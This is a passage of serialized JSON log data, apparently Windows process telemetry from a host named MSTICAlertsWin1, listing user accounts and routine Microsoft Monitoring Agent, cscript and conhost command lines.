n\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"MSTICAlertsWin1\\\\MSTICAdmin\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"NaN\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\",\"WORKGROUP\\\\MSTICAlertsWin1$\"],\"CommandLine\":[\"nan\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\CMF-64/DesiredStateConfiguration\\\\DscRun.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\\Registry.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\ICT 2\\\\work\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\\ServiceState.mof\\\" \\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\work\\\\ServiceState\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"MonitorKnowledgeDiscovery.vbs\\\"\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State\\\\CT_602681692\\\\NativeDSC\\\\DesiredStateConfiguration\\\\ASMHost.exe\\\" GetInventory \\\"C:\\\\Program 